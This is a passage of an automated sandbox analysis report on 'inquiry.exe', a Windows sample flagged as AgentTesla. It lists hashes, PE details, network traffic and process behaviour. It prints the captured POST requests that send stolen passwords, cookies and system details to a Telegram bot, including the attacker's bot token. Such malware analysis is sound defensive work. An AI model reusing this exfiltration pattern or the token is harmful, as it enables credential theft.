                                                                            UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Roaming\dj2qhmgg.ty5\Chrome\Default\Cookies
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                            Category:dropped
                                                                            Size (bytes):20480
                                                                            Entropy (8bit):0.6951152985249047
                                                                            Encrypted:false
                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                            MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                            SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                            SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                            SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.084849960366302
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:inquiry.exe
                                                                            File size:372736
                                                                            MD5:e15248f30c0657187fbb03e46430f97a
                                                                            SHA1:42b284897791f02b6b076acf13f406ffd5a4b19a
                                                                            SHA256:9f2dc372685655a102ba02d121745b124d47ea7b90d0f697181fda747a26ae2e
                                                                            SHA512:df22be2f037e745e0ecc42ace32c98447444d9f9c4f0bc95da86e901a515fa991db21f718a75b3951f9d6d0f32d5c8c71f74fa8f9bd83baf5571c5cc90b3905f
                                                                            SSDEEP:6144:t6Ln5Pq0DQf98AZiCdeTl8Wt/0urlIm8y1sOlAYjCMHGeKGDuGyGN:t6Ln5Pq0DQ5uuWtH5Im8sjC
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ivc.-...-...-... E..5... E.."... E..H...9|..>...-...X....I..,....I..,....I..,...Rich-...........................PE..L...$2Aa...

                                                                            File Icon

                                                                            Icon Hash:5a18da1af8cc862a

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x402a17
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows cui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x61413224 [Tue Sep 14 23:37:08 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:c2e2fa89aec204ac5f3945ce98025d14

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007F0960D06026h
                                                                            jmp 00007F0960D04EA0h
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            mov eax, dword ptr [ebp+08h]
                                                                            mov eax, dword ptr [eax]
                                                                            cmp dword ptr [eax], E06D7363h
                                                                            jne 00007F0960D05047h
                                                                            cmp dword ptr [eax+10h], 03h
                                                                            jne 00007F0960D05041h
                                                                            mov eax, dword ptr [eax+14h]
                                                                            cmp eax, 19930520h
                                                                            je 00007F0960D0503Dh
                                                                            cmp eax, 19930521h
                                                                            je 00007F0960D05036h
                                                                            cmp eax, 19930522h
                                                                            je 00007F0960D0502Fh
                                                                            cmp eax, 01994000h
                                                                            je 00007F0960D05028h
                                                                            xor eax, eax
                                                                            pop ebp
                                                                            retn 0004h
                                                                            call 00007F0960D06318h
                                                                            int3
                                                                            push 00402A21h
                                                                            call 00007F0960D066CAh
                                                                            pop ecx
                                                                            xor eax, eax
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push esi
                                                                            call 00007F0960D052C4h
                                                                            mov esi, eax
                                                                            test esi, esi
                                                                            je 00007F0960D0516Bh
                                                                            mov edx, dword ptr [esi+5Ch]
                                                                            mov ecx, edx
                                                                            push edi
                                                                            mov edi, dword ptr [ebp+08h]
                                                                            cmp dword ptr [ecx], edi
                                                                            je 00007F0960D0502Fh
                                                                            add ecx, 0Ch
                                                                            lea eax, dword ptr [edx+00000090h]
                                                                            cmp ecx, eax
                                                                            jc 00007F0960D05011h
                                                                            lea eax, dword ptr [edx+00000090h]
                                                                            cmp ecx, eax
                                                                            jnc 00007F0960D05026h
                                                                            cmp dword ptr [ecx], edi
                                                                            je 00007F0960D05024h
                                                                            xor ecx, ecx
                                                                            test ecx, ecx
                                                                            je 00007F0960D05136h
                                                                            mov edx, dword ptr [ecx+08h]
                                                                            test edx, edx
                                                                            je 00007F0960D0512Bh
                                                                            cmp edx, 05h
                                                                            jne 00007F0960D0502Eh
                                                                            and dword ptr [ecx+08h], 00000000h
                                                                            xor eax, eax
                                                                            inc eax
                                                                            jmp 00007F0960D0511Bh
                                                                            cmp edx, 01h
                                                                            jne 00007F0960D0502Ah
                                                                            or eax, FFFFFFFFh
                                                                            jmp 00007F0960D0510Eh

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ C ] VS2015 UPD3.1 build 24215
                                                                            • [C++] VS2013 build 21005
                                                                            • [LNK] VS2015 UPD3.1 build 24215
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [RES] VS2015 UPD3 build 24213

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x113bc0xc8.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x48240.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f0000xd74.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x10e300x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10e500x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x1c0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000xb6d60xb800False0.581861413043data6.64629597129IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0xd0000x4dd40x4e00False0.389372996795data4.66939133534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x120000x31c40x1400False0.319921875data3.49601973843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x160000x482400x48400False0.730830314663data7.18862845135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x5f0000xd740xe00False0.80078125data6.45894600022IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            OZX0x160f00x3790adataEnglishUnited States
                                                                            RT_ICON0x4da000x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                            RT_GROUP_ICON0x5e2280x14dataEnglishUnited States

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllFreeLibrary, GetProcAddress, LoadLibraryExW, lstrcmpiW, lstrcpyW, lstrcatW, lstrlenW, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, LCMapStringW, VirtualProtect, GetStringTypeW, HeapReAlloc, OutputDebugStringW, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, GetModuleHandleW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, GetCurrentProcess, GetProcessHeap, HeapFree, HeapAlloc, GetLastError, HeapSize, ExpandEnvironmentStringsW, GetCommandLineW, SetLastError, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, CreateFileW
                                                                            MSWSOCK.dllgetnetbyname, SetServiceA, GetAddressByNameA, EnumProtocolsA, rcmd, AcceptEx
                                                                            rtutils.dllTraceGetConsoleW, TraceVprintfExW, RouterLogEventStringA, RouterLogEventW, TraceDeregisterW, LogEventA
                                                                            MAPI32.dll
                                                                            WININET.dllGopherFindFirstFileW, InternetQueryOptionA, InternetHangUp, FindFirstUrlCacheContainerW
                                                                            RPCRT4.dllNDRSContextMarshall, NdrSimpleStructFree, RpcServerInqBindings, NdrConvert2, NdrNonEncapsulatedUnionBufferSize, NdrConformantArrayUnmarshall
                                                                            SHELL32.dllExtractAssociatedIconExA, SHBrowseForFolder
                                                                            USER32.dllMessageBoxW, GetDC, GrayStringA
                                                                            ADVAPI32.dllRegQueryValueExW, RegQueryValueExA, RegOpenKeyExW, RegCloseKey, StartServiceCtrlDispatcherW

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Sep 15, 2021 16:15:45.103359938 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:45.103410959 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:45.103543997 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:45.209914923 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:45.209954023 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:45.274728060 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:45.274981976 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:45.279645920 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:45.279670000 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:45.280087948 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:45.326920033 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:46.835547924 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:46.863400936 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:46.865629911 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:46.907140970 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:47.031013012 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:47.032561064 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:47.032588005 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:47.032655001 CEST44349815149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:47.032655954 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:47.032701969 CEST49815443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.175383091 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.175430059 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.175590992 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.176250935 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.176260948 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.233170033 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.237601042 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.237663031 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.291100025 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.292366028 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.292439938 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.545851946 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.547219992 CEST49816443192.168.2.6149.154.167.220
                                                                            Sep 15, 2021 16:15:48.547245026 CEST44349816149.154.167.220192.168.2.6
                                                                            Sep 15, 2021 16:15:48.547663927 CEST49816443192.168.2.6149.154.167.220

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Sep 15, 2021 16:13:46.895108938 CEST4928353192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:13:46.924200058 CEST53492838.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:18.379139900 CEST5837753192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:18.415112972 CEST53583778.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:35.998142004 CEST5507453192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:36.070501089 CEST53550748.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:36.555069923 CEST5451353192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:36.586505890 CEST53545138.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:37.095172882 CEST6204453192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:37.156869888 CEST53620448.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:37.467835903 CEST6379153192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:37.489142895 CEST6426753192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:37.502453089 CEST53637918.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:37.514149904 CEST53642678.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:38.016648054 CEST4944853192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:38.058224916 CEST53494488.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:38.507692099 CEST6034253192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:38.535490990 CEST53603428.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:39.094995975 CEST6134653192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:39.129574060 CEST53613468.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:39.169414997 CEST5177453192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:39.194205046 CEST53517748.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:40.029978037 CEST5602353192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:40.059937954 CEST53560238.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:40.854108095 CEST5838453192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:40.881985903 CEST53583848.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:41.369311094 CEST6026153192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:41.396296978 CEST53602618.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:55.202116966 CEST5606153192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:55.208825111 CEST5833653192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:14:55.245275974 CEST53560618.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:14:55.246695995 CEST53583368.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:00.079891920 CEST5378153192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:00.117870092 CEST53537818.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:14.386492968 CEST5406453192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:14.422173977 CEST53540648.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:36.179539919 CEST5281153192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:36.216857910 CEST53528118.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:37.877985954 CEST5529953192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:37.919578075 CEST53552998.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:44.943932056 CEST6374553192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:44.969933033 CEST53637458.8.8.8192.168.2.6
                                                                            Sep 15, 2021 16:15:48.143063068 CEST5005553192.168.2.68.8.8.8
                                                                            Sep 15, 2021 16:15:48.173480034 CEST53500558.8.8.8192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Sep 15, 2021 16:15:44.943932056 CEST192.168.2.68.8.8.80x2f50Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                            Sep 15, 2021 16:15:48.143063068 CEST192.168.2.68.8.8.80xdd5dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Sep 15, 2021 16:15:44.969933033 CEST8.8.8.8192.168.2.60x2f50No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                            Sep 15, 2021 16:15:48.173480034 CEST8.8.8.8192.168.2.60xdd5dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • api.telegram.org

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.649815149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-09-15 14:15:46 UTC0OUTPOST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9787feba99997
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1012
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            2021-09-15 14:15:46 UTC0INHTTP/1.1 100 Continue
                                                                            2021-09-15 14:15:46 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 37 66 65 62 61 39 39 39 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 31 37 31 32 31 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 37 66 65 62 61 39 39 39 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 31 32 34 34 30 36 0a 4f 53 46
                                                                            Data Ascii: -----------------------------8d9787feba99997Content-Disposition: form-data; name="chat_id"1717121719-----------------------------8d9787feba99997Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/124406OSF
                                                                            2021-09-15 14:15:47 UTC1INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 15 Sep 2021 14:15:47 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 600
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":1791,"from":{"id":1803146213,"is_bot":true,"first_name":"chima22bot","username":"chima22bot"},"chat":{"id":1717121719,"first_name":"Puzh6ix","type":"private"},"date":1631715346,"document":{"file_name":"user-124406 2021-09-15 07-34-38.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIG_2FCAAESNyeegdZR9DO2ceehGzLGHwACOAoAAiecEVL0TMUMUI5GAyAE","file_unique_id":"AgADOAoAAiecEVI","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/124406\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.649816149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-09-15 14:15:48 UTC2OUTPOST /bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9788283298e0e
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1900
                                                                            Expect: 100-continue
                                                                            2021-09-15 14:15:48 UTC2INHTTP/1.1 100 Continue
                                                                            2021-09-15 14:15:48 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 38 32 38 33 32 39 38 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 31 37 31 32 31 37 31 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 38 38 32 38 33 32 39 38 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 2f 31 32 34 34 30 36
                                                                            Data Ascii: -----------------------------8d9788283298e0eContent-Disposition: form-data; name="chat_id"1717121719-----------------------------8d9788283298e0eContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/124406
                                                                            2021-09-15 14:15:48 UTC3OUTData Raw: 6a a0 f3 72 71 24 12 b3 9d 31 b4 dd dd ec b2 ef 68 8d c7 6c b3 64 e9 4c b5 f5 11 96 5f a1 66 47 6c 50 e9 db 39 28 d3 e8 a5 09 8b 51 77 8e 62 d4 9d 82 96 96 56 af 2f 94 0c 0b c4 28 ec 63 fb ed fb 73 4e b3 aa 56 e2 e6 42 5a ad 2e 05 35 5e 7d a8 1b 16 ea 43 c1 a0 30 de be b0 8a f2 8c 6b 6e f4 fc 61 fd b8 39 51 77 65 a4 06 94 de bb 93 e9 ae ed c9 9a 8e 55 bb 73 67 ba af 3f 99 de 4d ef 90 77 c7 e8 c5 61 a8 a9 de 12 f1 f8 42 89 e0 72 dd 72 5b 50 e3 ee d5 dd db 37 b8 eb 3b e0 44 51 3a 46 a4 1f a5 af 9c 1b 00 00 00 00 00 00 00 fc 2b 5d 2f 8a 89 c6 85 f3 1a dd cc 17 35 6e ec cd 31 b5 ec 1e ba 98 85 f8 8d d7 78 c4 70 e3 e5 d4 5a 41 6c 6e cc e7 b5 a2 6a 73 8d 97 ec d6 f8 2a e2 ee ff a7 88 34 25 fd 22 9d f9 a7 ff 0b 00 00 00 00 00 00 00 ac 28 2c 26 84 65 4e 01 c4 d5
                                                                            Data Ascii: jrq$1hldL_fGlP9(QwbV/(csNVBZ.5^}C0kna9QweUsg?MwaBrr[P7;DQ:F+]/5n1xpZAlnjs*4%"(,&eN
                                                                            2021-09-15 14:15:48 UTC4INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 15 Sep 2021 14:15:48 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 612
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":1792,"from":{"id":1803146213,"is_bot":true,"first_name":"chima22bot","username":"chima22bot"},"chat":{"id":1717121719,"first_name":"Puzh6ix","type":"private"},"date":1631715348,"document":{"file_name":"user-124406 2021-09-15 07-52-53.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIHAAFhQgABFLO-vknL1-cNM0y8hS04hdcAAjkKAAInnBFSvsTLbAqpgg4gBA","file_unique_id":"AgADOQoAAiecEVI","file_size":1315},"caption":"New Cookie Recovered!\n\nUser Name: user/124406\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:16:13:51
                                                                            Start date:15/09/2021
                                                                            Path:C:\Users\user\Desktop\inquiry.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\inquiry.exe'
                                                                            Imagebase:0xd40000
                                                                            File size:372736 bytes
                                                                            MD5 hash:E15248F30C0657187FBB03E46430F97A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Start time:16:13:52
                                                                            Start date:15/09/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:16:13:52
                                                                            Start date:15/09/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\inquiry.exe'
                                                                            Imagebase:0xbf0000
                                                                            File size:261728 bytes
                                                                            MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
